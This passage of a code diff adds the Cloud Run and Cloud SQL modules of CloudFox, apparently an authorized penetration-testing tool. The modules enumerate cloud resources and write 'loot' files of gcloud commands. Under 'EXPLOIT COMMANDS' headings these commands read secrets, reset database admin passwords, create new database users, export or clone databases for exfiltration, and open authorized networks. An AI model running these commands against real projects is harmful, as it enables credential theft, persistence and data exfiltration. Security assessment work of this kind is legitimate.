logger.InfoM(fmt.Sprintf("Enumerating Cloud Run in project: %s", projectID), globals.GCP_CLOUDRUN_MODULE_NAME) + } + + cs := CloudRunService.New() + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["cloudrun-commands"] = &internal.LootFile{ + Name: "cloudrun-commands", + Contents: "# Cloud Run Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["cloudrun-secret-refs"] = &internal.LootFile{ + Name: "cloudrun-secret-refs", + Contents: "# Cloud Run Secret Manager References\n# Generated by CloudFox\n# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n", + } + } + m.mu.Unlock() + + // Get services + services, err := cs.Services(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDRUN_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Run services in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectServices[projectID] = services + for _, svc := range services { + m.addServiceToLoot(projectID, svc) + } + m.mu.Unlock() + } + + // Get jobs + jobs, err := cs.Jobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDRUN_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Run jobs in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectJobs[projectID] = jobs + for _, job := range jobs { + m.addJobToLoot(projectID, job) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service(s), %d job(s) in project %s", len(services), len(jobs), projectID), globals.GCP_CLOUDRUN_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudRunModule) addServiceToLoot(projectID string, svc CloudRunService.ServiceInfo) { + commandsLoot := m.LootMap[projectID]["cloudrun-commands"] + secretRefsLoot := m.LootMap[projectID]["cloudrun-secret-refs"] + + if commandsLoot == nil { + return + } + + // All commands for this service + commandsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SERVICE: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Image: %s\n"+ + "# Service Account: %s\n"+ + "# Public: %v\n"+ + "# URL: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe service:\n"+ + "gcloud run services describe %s --region=%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud run services get-iam-policy %s --region=%s --project=%s\n"+ + "# List revisions:\n"+ + "gcloud run revisions list --service=%s --region=%s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Invoke the service (if you have run.routes.invoke):\n"+ + "curl -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s\n\n", + svc.Name, svc.ProjectID, svc.Region, + svc.ContainerImage, + svc.ServiceAccount, + svc.IsPublic, + svc.URL, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + svc.URL, + ) + + // Add secret references to loot + if len(svc.SecretRefs) > 0 && secretRefsLoot != nil { + secretRefsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SERVICE: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n", svc.Name, svc.ProjectID, svc.Region) + for _, ref := range svc.SecretRefs { + if ref.Type == "env" { + secretRefsLoot.Contents += fmt.Sprintf( + "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", + ref.EnvVarName, ref.SecretVersion, ref.SecretName, svc.ProjectID, + ) + } else { + secretRefsLoot.Contents += fmt.Sprintf( + "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", + ref.MountPath, ref.SecretName, svc.ProjectID, + ) + } + } + secretRefsLoot.Contents += "\n" + } +} + +func (m *CloudRunModule) addJobToLoot(projectID string, job CloudRunService.JobInfo) { + commandsLoot := m.LootMap[projectID]["cloudrun-commands"] + secretRefsLoot := m.LootMap[projectID]["cloudrun-secret-refs"] + + if commandsLoot == nil { + return + } + + // All commands for this job + commandsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# JOB: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Image: %s\n"+ + "# Service Account: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe job:\n"+ + "gcloud run jobs describe %s --region=%s --project=%s\n"+ + "# List executions:\n"+ + "gcloud run jobs executions list --job=%s --region=%s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Execute the job (if you have run.jobs.run):\n"+ + "gcloud run jobs execute %s --region=%s --project=%s\n\n", + job.Name, job.ProjectID, job.Region, + job.ContainerImage, + job.ServiceAccount, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + ) + + // Add secret references to loot + if len(job.SecretRefs) > 0 && secretRefsLoot != nil { + secretRefsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# JOB: %s (Project: %s, Region: %s)\n"+ + "# =============================================================================\n", job.Name, job.ProjectID, job.Region) + for _, ref := range job.SecretRefs { + if ref.Type == "env" { + secretRefsLoot.Contents += fmt.Sprintf( + "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", + ref.EnvVarName, ref.SecretVersion, ref.SecretName, job.ProjectID, + ) + } else { + secretRefsLoot.Contents += fmt.Sprintf( + "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", + ref.MountPath, ref.SecretName, job.ProjectID, + ) + } + } + secretRefsLoot.Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *CloudRunModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectServices { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectJobs { + projectsWithData[projectID] = true + } + + // Build project-level outputs + for projectID := range projectsWithData { + services := m.ProjectServices[projectID] + jobs := m.ProjectJobs[projectID] + + tables := m.buildTablesForProject(projectID, services, jobs) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isCloudRunEmptyLoot(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = CloudRunOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDRUN_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *CloudRunModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allServices := m.getAllServices() + allJobs := m.getAllJobs() + + tables := m.buildTablesForProject("", allServices, allJobs) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isCloudRunEmptyLoot(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := CloudRunOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDRUN_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// isCloudRunEmptyLoot checks if a loot file contains only the header +func isCloudRunEmptyLoot(contents string) bool { + return strings.HasSuffix(contents, "# WARNING: Only use with proper authorization\n\n") || + strings.HasSuffix(contents, "# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n") +} + +// buildTablesForProject builds all tables for a given project's services and jobs +func (m *CloudRunModule) buildTablesForProject(projectID string, services []CloudRunService.ServiceInfo, jobs []CloudRunService.JobInfo) []internal.TableFile { + tableFiles := []internal.TableFile{} + + // Services table + servicesHeader := []string{ + "Project", "Type", "Name", "Region", "Status", "URL", "Ingress", "Public", + "Service Account", "SA Attack Paths", "Default SA", "Image", "VPC Access", + "Min/Max", "IAM Binding Role", "IAM Binding Principal", + } + + var servicesBody [][]string + for _, svc := range services { + publicStatus := "No" + if svc.IsPublic { + publicStatus = "Yes" + } + defaultSA := "No" + if svc.UsesDefaultSA { + defaultSA = "Yes" + } + vpcAccess := "-" + if svc.VPCAccess != "" { + vpcAccess = extractName(svc.VPCAccess) + if svc.VPCEgressSettings != "" { + vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(svc.VPCEgressSettings, "VPC_EGRESS_")) + } + } + scaling := fmt.Sprintf("%d/%d", svc.MinInstances, svc.MaxInstances) + + status := svc.Status + if status == "" { + status = "-" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if svc.ServiceAccount != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, svc.ServiceAccount) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" + } + + // If service has IAM bindings, create one row per binding + if len(svc.IAMBindings) > 0 { + for _, binding := range svc.IAMBindings { + servicesBody = append(servicesBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", svc.Name, svc.Region, status, svc.URL, + formatIngress(svc.IngressSettings), publicStatus, svc.ServiceAccount, + attackPaths, defaultSA, svc.ContainerImage, vpcAccess, scaling, + binding.Role, binding.Member, + }) + } + } else { + // Service has no IAM bindings - single row + servicesBody = append(servicesBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", svc.Name, svc.Region, status, svc.URL, + formatIngress(svc.IngressSettings), publicStatus, svc.ServiceAccount, + attackPaths, defaultSA, svc.ContainerImage, vpcAccess, scaling, + "-", "-", + }) + } + } + + if len(servicesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-services", + Header: servicesHeader, + Body: servicesBody, + }) + } + + // Jobs table + jobsHeader := []string{ + "Project", "Type", "Name", "Region", "Status", "Service Account", "SA Attack Paths", "Default SA", + "Image", "VPC Access", "Tasks", "Parallelism", "Last Execution", + "IAM Binding Role", "IAM Binding Principal", + } + + var jobsBody [][]string + for _, job := range jobs { + defaultSA := "No" + if job.UsesDefaultSA { + defaultSA = "Yes" + } + lastExec := "-" + if job.LastExecution != "" { + lastExec = extractName(job.LastExecution) + } + + status := job.Status + if status == "" { + status = "-" + } + + vpcAccess := "-" + if job.VPCAccess != "" { + vpcAccess = extractName(job.VPCAccess) + if job.VPCEgressSettings != "" { + vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(job.VPCEgressSettings, "VPC_EGRESS_")) + } + } + + // Check attack paths (privesc/exfil/lateral) for the service account + jobAttackPaths := "run foxmapper" + if job.ServiceAccount != "" { + jobAttackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, job.ServiceAccount) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + jobAttackPaths = "No SA" + } + + // If job has IAM bindings, create one row per binding + if len(job.IAMBindings) > 0 { + for _, binding := range job.IAMBindings { + jobsBody = append(jobsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", job.Name, job.Region, status, + job.ServiceAccount, jobAttackPaths, defaultSA, job.ContainerImage, vpcAccess, + fmt.Sprintf("%d", job.TaskCount), fmt.Sprintf("%d", job.Parallelism), + lastExec, binding.Role, binding.Member, + }) + } + } else { + // Job has no IAM bindings - single row + jobsBody = append(jobsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", job.Name, job.Region, status, + job.ServiceAccount, jobAttackPaths, defaultSA, job.ContainerImage, vpcAccess, + fmt.Sprintf("%d", job.TaskCount), fmt.Sprintf("%d", job.Parallelism), + lastExec, "-", "-", + }) + } + } + + if len(jobsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-jobs", + Header: jobsHeader, + Body: jobsBody, + }) + } + + // Secrets table (includes hardcoded secrets and environment variables) + secretsHeader := []string{ + "Project", "Resource Type", "Name", "Region", "Env Var", "Value/Type", "Source", "Sensitive", + } + + var secretsBody [][]string + + // Add environment variables + for _, svc := range services { + for _, env := range svc.EnvVars { + sensitive := isSensitiveEnvVar(env.Name) + if env.Source == "direct" { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", + svc.Name, svc.Region, env.Name, env.Value, "EnvVar", sensitive, + }) + } else { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", + svc.Name, svc.Region, env.Name, fmt.Sprintf("%s:%s", env.SecretName, env.SecretVersion), "SecretManager", sensitive, + }) + } + } + } + for _, job := range jobs { + for _, env := range job.EnvVars { + sensitive := isSensitiveEnvVar(env.Name) + if env.Source == "direct" { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", + job.Name, job.Region, env.Name, env.Value, "EnvVar", sensitive, + }) + } else { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(job.ProjectID), "Job", + job.Name, job.Region, env.Name, fmt.Sprintf("%s:%s", env.SecretName, env.SecretVersion), "SecretManager", sensitive, + }) + } + } + } + + if len(secretsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-secrets", + Header: secretsHeader, + Body: secretsBody, + }) + } + + return tableFiles +} + +// Helper functions + +// formatIngress formats ingress settings for display +func formatIngress(ingress string) string { + switch ingress { + case "INGRESS_TRAFFIC_ALL": + return "ALL (Public)" + case "INGRESS_TRAFFIC_INTERNAL_ONLY": + return "INTERNAL" + case "INGRESS_TRAFFIC_INTERNAL_LOAD_BALANCER": + return "INT+LB" + default: + return ingress + } +} + +// extractName extracts just the name from a resource path +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// sensitiveEnvVarPatterns contains patterns that indicate sensitive env vars +var sensitiveEnvVarPatterns = []string{ + "PASSWORD", "PASSWD", "SECRET", "API_KEY", "APIKEY", "API-KEY", + "TOKEN", "ACCESS_TOKEN", "AUTH_TOKEN", "BEARER", "CREDENTIAL", + "PRIVATE_KEY", "PRIVATEKEY", "CONNECTION_STRING", "CONN_STR", + "DATABASE_URL", "DB_PASSWORD", "DB_PASS", "MYSQL_PASSWORD", + "POSTGRES_PASSWORD", "REDIS_PASSWORD", "MONGODB_URI", + "AWS_ACCESS_KEY", "AWS_SECRET", "AZURE_KEY", "GCP_KEY", + "ENCRYPTION_KEY", "SIGNING_KEY", "JWT_SECRET", "SESSION_SECRET", + "OAUTH", "CLIENT_SECRET", +} + +// isSensitiveEnvVar checks if an environment variable name indicates sensitive data +func isSensitiveEnvVar(envName string) string { + envNameUpper := strings.ToUpper(envName) + for _, pattern := range sensitiveEnvVarPatterns { + if strings.Contains(envNameUpper, pattern) { + return "Yes" + } + } + return "No" +} + diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go new file mode 100644 index 00000000..0bb1dc58 --- /dev/null +++ b/gcp/commands/cloudsql.go @@ -0,0 +1,563 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + CloudSQLService "github.com/BishopFox/cloudfox/gcp/services/cloudsqlService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudSQLCommand = &cobra.Command{ + Use: globals.GCP_CLOUDSQL_MODULE_NAME, + Aliases: []string{"sql", "database", "db"}, + Short: "Enumerate Cloud SQL instances with security analysis", + Long: `Enumerate Cloud SQL instances across projects with security-relevant details. + +Features: +- Lists all Cloud SQL instances (MySQL, PostgreSQL, SQL Server) +- Shows network configuration (public/private IP, authorized networks) +- Identifies publicly accessible databases +- Shows SSL/TLS configuration and requirements +- Checks backup and high availability configuration +- Shows encryption type (Google-managed vs CMEK) +- Shows IAM database authentication status +- Shows password policy configuration +- Shows maintenance window settings +- Shows point-in-time recovery status +- Identifies common security misconfigurations +- Generates gcloud commands for further analysis + +Security Columns: +- PublicIP: Whether the instance has a public IP address +- RequireSSL: Whether SSL/TLS is required for connections +- AuthNetworks: Number of authorized network ranges +- Backups: Automated backup status +- PITR: Point-in-time recovery status +- Encryption: CMEK or Google-managed +- IAM Auth: IAM database authentication +- PwdPolicy: Password validation policy +- HA: High availability configuration +- Issues: Detected security misconfigurations + +Attack Surface: +- Public IPs expose database to internet scanning +- Missing SSL allows credential sniffing +- 0.0.0.0/0 in authorized networks = world accessible +- Default service accounts may have excessive permissions +- Google-managed encryption may not meet compliance +- Missing password policy allows weak passwords`, + Run: runGCPCloudSQLCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudSQLModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectInstances map[string][]CloudSQLService.SQLInstanceInfo // projectID -> instances + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudSQLOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudSQLOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudSQLOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudSQLCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDSQL_MODULE_NAME) + if err != nil { + return + } + + module := &CloudSQLModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]CloudSQLService.SQLInstanceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudSQLModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDSQL_MODULE_NAME, m.processProject) + + // Get all instances for stats + allInstances := m.getAllInstances() + if len(allInstances) == 0 { + logger.InfoM("No Cloud SQL instances found", globals.GCP_CLOUDSQL_MODULE_NAME) + return + } + + // Count public instances + publicCount := 0 + for _, instance := range allInstances { + if instance.HasPublicIP { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d instance(s), %d with public IP", len(allInstances), publicCount), globals.GCP_CLOUDSQL_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(allInstances)), globals.GCP_CLOUDSQL_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// getAllInstances returns all instances from all projects (for statistics) +func (m *CloudSQLModule) getAllInstances() []CloudSQLService.SQLInstanceInfo { + var all []CloudSQLService.SQLInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudSQLModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud SQL instances in project: %s", projectID), globals.GCP_CLOUDSQL_MODULE_NAME) + } + + cs := CloudSQLService.New() + instances, err := cs.Instances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDSQL_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud SQL in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectInstances[projectID] = instances + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["cloudsql-commands"] = &internal.LootFile{ + Name: "cloudsql-commands", + Contents: "# Cloud SQL Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, instance := range instances { + m.addInstanceToLoot(projectID, instance) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) in project %s", len(instances), projectID), globals.GCP_CLOUDSQL_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudSQLModule) addInstanceToLoot(projectID string, instance CloudSQLService.SQLInstanceInfo) { + lootFile := m.LootMap[projectID]["cloudsql-commands"] + if lootFile == nil { + return + } + + dbType := getDatabaseType(instance.DatabaseVersion) + connectionInstance := fmt.Sprintf("%s:%s:%s", instance.ProjectID, instance.Region, instance.Name) + + publicIP := instance.PublicIP + if publicIP == "" { + publicIP = "-" + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CLOUD SQL: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Version: %s\n"+ + "# Public IP: %s\n", + instance.Name, + instance.ProjectID, instance.Region, + instance.DatabaseVersion, + publicIP, + ) + + // gcloud commands + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "gcloud sql instances describe %s --project=%s\n"+ + "gcloud sql databases list --instance=%s --project=%s\n"+ + "gcloud sql users list --instance=%s --project=%s\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) + + // Connection commands based on database type + switch dbType { + case "mysql": + if instance.PublicIP != "" { + lootFile.Contents += fmt.Sprintf( + "mysql -h %s -u root -p\n", + instance.PublicIP, + ) + } + lootFile.Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:3306\n", + connectionInstance, + ) + case "postgres": + if instance.PublicIP != "" { + lootFile.Contents += fmt.Sprintf( + "psql -h %s -U postgres\n", + instance.PublicIP, + ) + } + lootFile.Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:5432\n", + connectionInstance, + ) + case "sqlserver": + if instance.PublicIP != "" { + lootFile.Contents += fmt.Sprintf( + "sqlcmd -S %s -U sqlserver\n", + instance.PublicIP, + ) + } + lootFile.Contents += fmt.Sprintf( + "cloud_sql_proxy -instances=%s=tcp:1433\n", + connectionInstance, + ) + } + + // === EXPLOIT COMMANDS === + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + + // Password reset + lootFile.Contents += fmt.Sprintf( + "# Reset database user password (requires cloudsql.users.update):\n"+ + "gcloud sql users set-password root --host=%% --instance=%s --project=%s --password=NEW_PASSWORD\n"+ + "gcloud sql users set-password postgres --instance=%s --project=%s --password=NEW_PASSWORD\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) + + // Create new user + lootFile.Contents += fmt.Sprintf( + "# Create a new database user (requires cloudsql.users.create):\n"+ + "gcloud sql users create cloudfox_user --instance=%s --project=%s --password=GENERATED_PASSWORD\n\n", + instance.Name, instance.ProjectID, + ) + + // Backup exfiltration + lootFile.Contents += fmt.Sprintf( + "# List existing backups:\n"+ + "gcloud sql backups list --instance=%s --project=%s\n\n"+ + "# Create a new backup (for exfiltration):\n"+ + "gcloud sql backups create --instance=%s --project=%s\n\n"+ + "# Export database to GCS bucket (data exfiltration):\n"+ + "gcloud sql export sql %s gs://BUCKET_NAME/export-%s.sql --database=DATABASE_NAME --project=%s\n"+ + "gcloud sql export csv %s gs://BUCKET_NAME/export-%s.csv --database=DATABASE_NAME --query=\"SELECT * FROM TABLE_NAME\" --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.Name, instance.ProjectID, + instance.Name, instance.Name, instance.ProjectID, + ) + + // Clone instance + lootFile.Contents += fmt.Sprintf( + "# Clone instance to attacker-controlled project (requires cloudsql.instances.clone):\n"+ + "gcloud sql instances clone %s %s-clone --project=%s\n\n", + instance.Name, instance.Name, instance.ProjectID, + ) + + // IAM authentication exploitation + if instance.IAMAuthentication { + lootFile.Contents += fmt.Sprintf( + "# IAM database authentication is enabled - connect using SA token:\n"+ + "gcloud sql generate-login-token | %s\n\n", + func() string { + switch dbType { + case "mysql": + return fmt.Sprintf("mysql -h %s -u SA_EMAIL --enable-cleartext-plugin --password=$(cat -)", connectionInstance) + case "postgres": + return fmt.Sprintf("PGPASSWORD=$(cat -) psql -h %s -U SA_EMAIL", connectionInstance) + default: + return "# Use the token as password for database connection" + } + }(), + ) + } + + // Authorized network manipulation + lootFile.Contents += fmt.Sprintf( + "# Add your IP to authorized networks (requires cloudsql.instances.update):\n"+ + "gcloud sql instances patch %s --project=%s --authorized-networks=YOUR_IP/32\n\n", + instance.Name, instance.ProjectID, + ) + + // Surface security issues if any were detected + if len(instance.SecurityIssues) > 0 { + lootFile.Contents += "# Security Issues:\n" + for _, issue := range instance.SecurityIssues { + lootFile.Contents += fmt.Sprintf("# - %s\n", issue) + } + } + + lootFile.Contents += "\n" +} + +// getDatabaseType returns the database type from version string +func getDatabaseType(version string) string { + switch { + case strings.HasPrefix(version, "MYSQL"): + return "mysql" + case strings.HasPrefix(version, "POSTGRES"): + return "postgres" + case strings.HasPrefix(version, "SQLSERVER"): + return "sqlserver" + default: + return "unknown" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *CloudSQLModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, instances := range m.ProjectInstances { + body := m.instancesToTableBody(instances) + tables := []internal.TableFile{{ + Name: globals.GCP_CLOUDSQL_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = CloudSQLOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDSQL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *CloudSQLModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allInstances := m.getAllInstances() + body := m.instancesToTableBody(allInstances) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tableFiles := []internal.TableFile{{ + Name: globals.GCP_CLOUDSQL_MODULE_NAME, + Header: header, + Body: body, + }} + + output := CloudSQLOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDSQL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getTableHeader returns the table header for Cloud SQL instances +func (m *CloudSQLModule) getTableHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Database", + "Tier", + "Public IP", + "Private IP", + "SSL", + "Backups", + "PITR", + "Encrypt", + "IAM Auth", + "PwdPolicy", + "HA", + "Auth Network", + "CIDR", + "Public Access", + } +} + +// instancesToTableBody converts instances to 